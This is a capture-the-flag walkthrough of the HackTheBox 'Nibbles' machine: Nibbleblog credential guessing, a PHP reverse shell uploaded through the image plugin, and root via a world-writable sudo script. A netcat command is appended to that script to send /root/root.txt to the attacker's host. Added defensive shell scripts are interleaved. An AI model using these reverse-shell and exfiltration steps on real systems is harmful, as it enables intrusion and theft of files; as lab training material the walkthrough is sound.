I started off with a quick Nmap scan on the target machine.
nmap -sS -sV -Pn 10.10.10.75
Starting Nmap 7.70 ( https://nmap.org ) at 2018-03-24 00:46 AEST
Nmap scan report for 10.10.10.75
Host is up (0.23s latency).
Not shown: 998 closed ports
PORT   STATE SERVICE VERSION
22/tcp open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
80/tcp open  http    Apache httpd 2.4.18 ((Ubuntu))
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Fairly standard ports were open, and because there was an HTTP port open, I decided to see if there was anything meaningful on it.
Nothing interesting on the page itself, but when you look at the source you can see something interesting!
Browsing to this directory we stumble across a blog but there is nothing interesting that we can leverage.
This meant more enumeration had to be done. After a little bit of googling, I came across their Github repository located at:
If you look at the repository we can see a few files of interest:
admin.php install.php update.php
There wasn’t anything too interesting inside install.php and update.php other than a version number for the hosted web application:
Nibbleblog 4.0.3 "Coffee" ©2009 - 2014 | Developed by Diego Najar
However, admin.php looked like a potential path we can dive into.
I had a quick check on Google to see if there were any exploits available that would allow us to bypass the login page, but it returned no results, so it meant that I would (most likely) have to bruteforce the login.
After several rounds of trial and error, I found the credentials, which were:
Username: admin Password: nibbles
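The bruteforce above leaves a very visible trace in the web server's access log: one client repeating POST requests to admin.php. Here is an added example, not part of the original write-up, that flags such clients from Apache combined-format log lines. The log lines and the threshold are constructed for the demo.

```shell
#!/bin/sh
# Added defensive example, not code from the original write-up: flag clients
# that hammer the Nibbleblog admin login (repeated POSTs to admin.php).
# Apache combined log format is assumed: field 1 is the client IP, field 6
# is the quoted method and field 7 the request path.

# Usage: count_login_posts < access.log
# Prints "<count> <ip>" for every client that POSTed to admin.php,
# highest count first.
count_login_posts() {
    awk '$6 == "\"POST" && $7 ~ /\/admin\.php/ { n[$1]++ }
         END { for (ip in n) print n[ip], ip }' | sort -rn
}

# Usage: flag_bruteforce THRESHOLD < access.log
# Prints only the IPs whose POST count meets or exceeds THRESHOLD.
flag_bruteforce() {
    count_login_posts | awk -v t="$1" '$1 >= t { print $2 }'
}

# Constructed sample log: one client sends six login POSTs in a few seconds,
# a second client logs in once and then browses normally.
SAMPLE_LOG='10.10.14.10 - - [24/Mar/2018:00:52:01 +1000] "GET /admin.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.10 - - [24/Mar/2018:00:52:03 +1000] "POST /admin.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.10 - - [24/Mar/2018:00:52:04 +1000] "POST /admin.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.10 - - [24/Mar/2018:00:52:05 +1000] "POST /admin.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.10 - - [24/Mar/2018:00:52:06 +1000] "POST /admin.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.10 - - [24/Mar/2018:00:52:07 +1000] "POST /admin.php HTTP/1.1" 200 1532 "-" "Mozilla/5.0"
10.10.14.10 - - [24/Mar/2018:00:52:08 +1000] "POST /admin.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.20 - - [24/Mar/2018:00:53:10 +1000] "POST /admin.php HTTP/1.1" 302 0 "-" "Mozilla/5.0"
10.10.14.20 - - [24/Mar/2018:00:53:11 +1000] "GET /index.php HTTP/1.1" 200 4021 "-" "Mozilla/5.0"'

# Demo: with an assumed threshold of 5 only the first client is reported.
printf '%s\n' "$SAMPLE_LOG" | flag_bruteforce 5
```

On a real log you would pipe `access.log` in instead of the sample and pick the threshold per time window rather than over the whole file; distinguishing failed from successful logins by status code needs knowledge of how the application responds, which this example does not assume.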
Inside the admin panel I couldn’t see anything that I could leverage, so I began to enumerate more. I found this link which explains how to exploit a vulnerability to achieve code execution. In short, the image plugin does not check the extensions of uploaded files, meaning we could upload a PHP file and gain code execution.
I found a generic reverse-shell.php (from here) which I modified with my IP and port.
With the payload ready to go, all I had to do is get a netcat session running on my VM.
nc -nvlp 8989
With everything locked and loaded, I uploaded my payload via the plugin.
You can see warnings, but we can ignore them. The plugin uploads images to this location:
and by navigating to this location, it would trigger the reverse shell back to my VM.
listening on [any] 8989 ...
connect to [10.10.14.10] from (UNKNOWN) [10.10.10.75] 54270
Linux Nibbles 4.4.0-104-generic #127-Ubuntu SMP Mon Dec 11 12:16:42 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
 10:59:13 up 11:55,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=1001(nibbler) gid=1001(nibbler) groups=1001(nibbler)
/bin/sh: 0: can't access tty; job control turned off
$ whoami
nibbler
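The upload step worked because the plugin accepted a .php file where only images belong. As an added example (not code from the write-up or from Nibbleblog), here is the check a defender would run over an upload directory: it flags anything whose extension is not on an image allowlist, and anything whose first bytes are a PHP open tag even when the extension looks like an image. The allowlist, the directory name and the sample files are constructed for the demo.

```shell
#!/bin/sh
# Added defensive example, not code from the original write-up or from
# Nibbleblog: scan a web application's upload directory for files that an
# image plugin should never have accepted. Two checks are made:
#   1. the extension is not on the image allowlist
#   2. the content starts with a PHP open tag, whatever the extension says
# The allowlist and the sample tree below are constructed for this demo.

# Usage: scan_uploads DIR
# Prints one "<reason> <path>" line per suspicious file.
scan_uploads() {
    find "$1" -type f | while IFS= read -r f; do
        case "$f" in
            *.jpg|*.jpeg|*.png|*.gif) ;;           # allowed (lower-case only)
            *) echo "bad-extension $f"; continue ;;
        esac
        # an allowed extension is not enough: look at the first bytes too
        if head -c 5 "$f" | grep -q '<?php'; then
            echo "php-content $f"
        fi
    done
}

# Build a small constructed upload tree so the example runs offline:
# a real-looking PNG header, a .php upload, and a PHP file renamed to .jpg.
make_sample() {
    d=$(mktemp -d)
    mkdir -p "$d/uploads"
    printf '\211PNG\r\n\032\n' > "$d/uploads/logo.png"
    printf '<?php /* constructed sample, not a payload */ ?>\n' > "$d/uploads/image.php"
    printf '<?php /* constructed sample, not a payload */ ?>\n' > "$d/uploads/photo.jpg"
    echo "$d"
}

# Demo run; for real use, drop this and point scan_uploads at the plugin's
# upload directory.
SAMPLE=$(make_sample)
scan_uploads "$SAMPLE/uploads"
rm -rf "$SAMPLE"
```

The same two checks belong in the upload handler itself (extension allowlist plus content sniffing), and the upload directory should additionally be served with PHP execution disabled so that a file which slips through cannot run.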
With a shell ready to go, all I had to do was navigate to the nibbler user folder and retrieve the user.txt flag.
$ cd /home/nibbler && dir
personal.zip  user.txt
$ cat user.txt
b0----------------------------d8
With the user flag out of the way, I decided to enumerate the machine a little bit more.
On a Linux machine, I always start off with the following command:
This command showed us a few interesting things:
$ sudo -l
Matching Defaults entries for nibbler on Nibbles:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User nibbler may run the following commands on Nibbles:
    (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
As you can see, our user can run monitor.sh as root without a password. This means that if we can modify this script, we could potentially elevate to root privileges.
If you recall from the previous “dir” command, we had a file called personal.zip. Luckily, the file was not password protected and I was able to unzip the file.
$ unzip personal.zip
Archive:  personal.zip
   creating: personal/
   creating: personal/stuff/
  inflating: personal/stuff/monitor.sh
I navigated to the directory with the bash script file and observed the privileges on it.
$ pwd
/home/nibbler/personal/stuff
$ ls -la
total 12
drwxr-xr-x 2 nibbler nibbler 4096 Dec 10  2017 .
drwxr-xr-x 3 nibbler nibbler 4096 Dec 10  2017 ..
-rwxrwxrwx 1 nibbler nibbler 4015 May  8  2015 monitor.sh
The script is owned by our user and is world-writable, so we have full read/write access to it.
From here, all I had to do was append my command to this script and it would be run as root.
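The root cause here is a sudo rule whose target a normal user can rewrite. As an added example (not code from the write-up), here is an audit that takes `sudo -l` style lines, pulls out each NOPASSWD target and reports whether a non-root account could modify or replace it: non-root ownership, group or world write bits, or a writable parent directory without the sticky bit. It assumes GNU `stat -c`; the sample tree mirrors the page's finding (a mode 777 script) and is constructed for the demo.

```shell
#!/bin/sh
# Added defensive example, not code from the original write-up: audit the
# targets of "NOPASSWD" sudo rules (as printed by `sudo -l`) and report any
# target that a non-root account could modify or replace. Such a rule is
# equivalent to a password-less root shell for that account.
# Assumes GNU coreutils stat (-c '%U' and '%a').

# Usage: sudo_targets < sudo-l-output
# Extracts the command path from lines such as
#   (root) NOPASSWD: /home/nibbler/personal/stuff/monitor.sh
sudo_targets() {
    sed -n 's/^[[:space:]]*([^)]*)[[:space:]]*NOPASSWD:[[:space:]]*//p' | cut -d' ' -f1
}

# Usage: check_sudo_target PATH
# Prints one reason per finding; returns 0 when the target looks safe and
# 1 when a non-root account could modify or replace it.
check_sudo_target() {
    t="$1"; bad=0
    if [ "$t" = ALL ]; then
        echo "all-commands   any command may be run as root without a password"
        return 1
    fi
    if [ ! -e "$t" ]; then
        echo "missing        $t (could be created by whoever can write its directory)"
        bad=1
    else
        owner=$(stat -c '%U' "$t"); mode=$(stat -c '%a' "$t")
        if [ "$owner" != root ]; then
            echo "non-root-owner $t (owned by $owner)"; bad=1
        fi
        # last octal digit is "other", the one before it "group"; 2/3/6/7 carry the write bit
        case "$mode" in
            *[2367])  echo "world-writable $t (mode $mode)"; bad=1 ;;
        esac
        case "$mode" in
            *[2367]?) echo "group-writable $t (mode $mode)"; bad=1 ;;
        esac
    fi
    # a world-writable parent without the sticky bit lets the file be replaced outright
    p=$(dirname "$t"); pmode=$(stat -c '%a' "$p" 2>/dev/null || echo 0)
    case "$pmode" in
        1*) ;;                                   # sticky bit: others cannot unlink/rename
        *[2367]) echo "writable-dir   $p (mode $pmode)"; bad=1 ;;
    esac
    return $bad
}

# Usage: audit_sudo_rules < sudo-l-output
# Checks every target found; the return value is the number of unsafe ones.
audit_sudo_rules() {
    unsafe_count=0
    for t in $(sudo_targets); do
        check_sudo_target "$t" || unsafe_count=$((unsafe_count + 1))
    done
    return $unsafe_count
}

# Demo over a constructed tree: a mode 777 script that root runs via sudo
# (as on this box) next to a mode 755 one for contrast.
demo() {
    d=$(mktemp -d)
    mkdir -p "$d/personal/stuff"
    echo '#!/bin/sh' > "$d/personal/stuff/monitor.sh"; chmod 777 "$d/personal/stuff/monitor.sh"
    echo '#!/bin/sh' > "$d/safe.sh"; chmod 755 "$d/safe.sh"
    printf '(root) NOPASSWD: %s\n(root) NOPASSWD: %s\n' \
        "$d/personal/stuff/monitor.sh" "$d/safe.sh" | audit_sudo_rules || echo "unsafe targets: $?"
    rm -rf "$d"
}
demo
```

Run it for real with `sudo -l | audit_sudo_rules` as the user in question; anything it reports should be fixed by making the target root-owned and mode 755 (or 750) in a root-owned directory, or by removing the rule.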
I quickly navigated to the /bin folder to check for anything I could leverage to get the root flag.
chvt nc tailf cp nc.openbsd tar
I saw that netcat was installed on the machine, so I quickly checked whether this was the version with the -e parameter.
nc -e
nc: invalid option -- 'e'
This is nc from the netcat-openbsd package. An alternative nc is available
in the netcat-traditional package.
This wasn’t too much of a worry, because I could still use plain netcat to transfer the file onto my VM.
I started a connection on my VM, listening to a file transfer:
nc -l -p 9000 > root.txt
Then I appended my command to the bottom of the monitor script.
echo "nc -w 3 10.10.14.10 9000 < /root/root.txt" >> monitor.sh
All that was left was to run the monitor script.
$ sudo /home/nibbler/personal/stuff/monitor.sh
On my local machine, I could see that my netcat listener had closed, which meant that it had successfully received the file.
All I had to do was look at the file on my VM and the machine was conquered!
root@kali:~/Desktop/HackTheBox/Nibbles# cat root.txt
b6----------------------------8c
Overall, the machine was fairly simple but fun. It definitely touched on a lot of the basics, which is always good to keep in check!